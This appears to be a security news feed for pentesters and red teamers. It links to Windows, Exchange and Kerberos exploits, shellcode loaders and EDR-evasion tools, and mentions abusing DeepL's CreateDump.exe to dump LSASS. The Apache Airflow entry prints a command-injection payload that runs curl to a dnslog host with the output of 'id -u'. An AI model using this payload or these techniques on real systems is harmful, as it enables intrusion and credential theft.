Phishing campaigns

Сделал github репозиторий, в котором представлены разборы/отчёты об фишинговых кампаниях APT группировок, которые содержат пример писем, с помощью которого осуществлялась рассылка. Зачастую разборы атак APT группировок не содержат примеры писем, это побудило меня создать репозиторий в котором будут отчёты/разборы, которые точно содержат фишинговое письмо. Постепенно данный список будет пополняться

Link: https://github.com/wddadk/Phishing-campaigns

#apt #git #phishing

🔑 Abuse Kerberos RC4 (CVE-2022-33679)

This blog post goes into detail on how Windows Kerberos Elevation of Privilege vulnerability works and how to force Kerberos to downgrade the encoding from the default AES encryption to the historical MD4-RC4. The vulnerability could allows an attacker to obtain an authenticated session on behalf of the victim and also lead to arbitrary code execution.

Research:
https://googleprojectzero.blogspot.com/2022/10/rc4-is-still-considered-harmful.html

Exploit:
https://github.com/Bdenneu/CVE-2022-33679

#ad #kerberos #rc4 #exploit

⚔️ Katana — Web Crawler

A next-generation crawling and spidering framework.

Features:
— Standard/Headless
— Customizable Config
— JavaScript parsing
— Scope control

https://github.com/projectdiscovery/katana

#web #crawler #tools #bugbounty

Bash Aliases for CrackMapExec Modules

CrackMapExec has one of the coolest features - "Audit Mode". This features makes life easier for a pentester by masking the password in the CME output. However, most often a pentester needs this functionality only as a one-time action, take a screenshot and disable it. That's why I wrote a simple Bash Alias that allows you to turn "Audit Mode" on and off with a single command.

As a bonus, I've implemented an Alias for the bh_owned module. This can be useful if you haven't received a BloodHound dump yet and a module error is annoys you.

Just include these lines in your ~/.zshrc or ~/.bashrc and enjoy.

Aliases:
alias CMEOwned='awk '\''/bh_enabled/{ if ($3=="False") {$3="True"} else {$3="False"}; {if($3=="True") {print "\033[1;92m" "[+] BloodHound Owned: "$3} else print "\033[1;91m" "[-] BloodHound Owned: "$3}} {print > FILENAME }'\'' /root/.cme/cme.conf'

alias CMEAudit='awk '\''/audit_mode/{ if ($3=="") {$3="*"} else {$3=""} {if($3==""){print "\033[1;92m" "[+] Audit Mode: Enable"} else print "\033[1;91m" "[-] Audit Mode: Disable"}} {print > FILENAME }'\'' /root/.cme/cme.conf'

#cme #bash #alias #bloodhound #audit #masking

⚙️ Psudohash — Password List Generator For Orchestrating Brute Force Attacks

This is a password list generator for orchestrating brute force attacks. It imitates certain password creation patterns commonly used by humans, like substituting a word's letters with symbols or numbers, using char-case variations, adding a common padding before or after the word and more.

https://github.com/t3l3machus/psudohash

#wordlist #password #generator #bruteforce

😈 [ ShitSecure, S3cur3Th1sSh1t ]

I really like DeepL for translations. But I also like the fact, that when using the Desktop APP is makes use of an signed executable named CreateDump.exe in %APPDATA%, which can dump e.g. LSASS 🧐🤩

🐥 [ tweet ]

🛠 DynamicSyscalls

This is a library written in .net resolves the syscalls dynamically (Has nothing to do with hooking/unhooking).

https://github.com/Shrfnt77/DynamicSyscalls

#maldev #csharp #syscall #library

🥷 PNG Steganography Hides Backdoor

Malware authors rely on LSB encoding to hide malicious payload in the PNG pixel data, more specifically in LSB of each color channel (Red, Green, Blue, and Alpha).

https://decoded.avast.io/martinchlumecky/png-steganography/

#maldev #steganography #png

💤 laZzzy

This is a shellcode loader, developed using different open-source libraries, that demonstrates different execution techniques.

Features:
— Direct syscalls and native functions;
— Import Address Table (IAT) evasion;
— Encrypted payload (XOR and AES);
— PPID spoofing;
— Blocking of non-Microsoft-signed DLLs;
— etc.

https://github.com/capt-meelo/laZzzy

#maldev #loader #cpp #redteam

Новые сюрпризы в AD CS... Добавим технику ESC11🙈

https://blog.compass-security.com/2022/11/relaying-to-ad-certificate-services-over-rpc/

#ad #pentest #redteam

💣 ProxyNotShell PoC

ProxyNotShell this is a new exploit used in the wild takes advantage of the recently published Microsoft Server-Side Request Forgery vulnerability (CVE-2022-41040) and a second vulnerability that allows Remote Code Execution (CVE-2022-41082) when PowerShell is available on the Exchange Server.

Research:
https://www.zerodayinitiative.com/blog/2022/11/14/control-your-types-or-get-pwned-remote-code-execution-in-exchange-powershell-backend

Nmap Checker:
https://github.com/CronUp/Vulnerabilidades/blob/main/proxynotshell_checker.nse

PoC:
https://github.com/testanull/ProxyNotShell-PoC

UPD:
PoC for Python3
Thanks to @hackerralf8
https://news.1rj.ru/str/RalfHackerChannel/1286

#exchange #proxynotshell #ssrf #rce

💨 Apache Airflow RCE

Tracked as CVE-2022-40127, the flaw affects Apache Airflow versions prior to 2.4.0. Apache Airflow could allow a remote attacker to execute arbitrary commands via the manually provided run_id parameter, which exists in Example Dags of Apache Airflow. By sending a specially crafted request, an attacker could exploit the CVE-2022-40127 flaw to execute arbitrary commands.

PoC:
1. Active example_bash_operator at DAGs
2. Run ID parameter
{"test":"\";curl `id -u`.xxx.dnslog.cn;\""}

#apache #airflow #dags #rce

Довольно интересный анализ на примере Аваста

Hooking System Calls in Windows 11 22H2 like Avast Antivirus. Research, analysis and bypass

https://the-deniss.github.io/posts/2022/12/08/hooking-system-calls-in-windows-11-22h2-like-avast-antivirus.html

#research #redteam

🎁 HackTheBox — ProLab Discount

HackTheBox is running a huge pro-lab discount this month. Use coupon code: "weloveprolabs22" and waive the setup fee ($95) of any pro lab. Each pro lab is $27/m, which makes this over 75% off.
The coupon expires at the end of the year.

#hackthebox #prolab #discount

⚔️ Mangle — EDR Bypass

This is a tool that manipulates aspects of compiled executables (.exe or DLL). Mangle can remove known Indicators of Compromise (IoC) based strings and replace them with random characters, change the file by inflating the size to avoid EDRs, and can clone code-signing certs from legitimate files. In doing so, Mangle helps loaders evade on-disk and in-memory scanners.

https://github.com/optiv/Mangle

#edr #bypass #inflate #certificate

⚔️ DirCreate2System

Weaponizing to get NT AUTHORITY\SYSTEM for Privileged Directory Creation Bugs with Windows Error Reporting

https://github.com/binderlabs/DirCreate2System

#windows #privesc #directory #error #report

💉 Dirty Vanity — A New Approach to Code injection & EDR bypass

A POC for the new injection technique, abusing windows fork API to evade EDRs.

Source:
https://github.com/deepinstinct/Dirty-Vanity

Research:
https://i.blackhat.com/EU-22/Thursday-Briefings/EU-22-Nissan-DirtyVanity.pdf

#av #edr #bypass #injection #fork #api

🔐 MULTIFACTOR — особенности 2FA

Существует неплохое решение для организации двухфакторной аутентификации в корпоративной среде под названием MULTIFACTOR. Входит в реестр российского ПО за номером 7046.

Это не реклама, поскольку сегодня буквально в двух словах мы расскажем про то как этот второй фактор можно обойти в некоторых очень частных случаях.

Бу-га-га.

#security #special

https://internet-lab.ru/multifactor_2fa_bug

😈 OWASSRF — New Exploit Method for Exchange Bypassing ProxyNotShell Mitigations

CrowdStrike recently discovered a new exploit method using CVE-2022-41080 and CVE-2022-41082 to achieve remote code execution (RCE) through Outlook Web Access.

https://www.crowdstrike.com/blog/owassrf-exploit-analysis-and-recommendations/

#owa #exchange #ssrf #proxynotshell

💥 Shellcode Mutator

New tool to help red teamers avoid detection. Shellcode is a small piece of code that is typically used as the payload in an exploit, and can often be detected by its “signature”, or unique pattern. Shellcode Mutator mutates exploit source code without affecting its functionality, changing its signature and making it harder to reliably detect as malicious.

Research:
https://labs.nettitude.com/blog/shellcode-source-mutations/

Source:
https://github.com/nettitude/ShellcodeMutator

#shellcode #mutator #nasm #redteam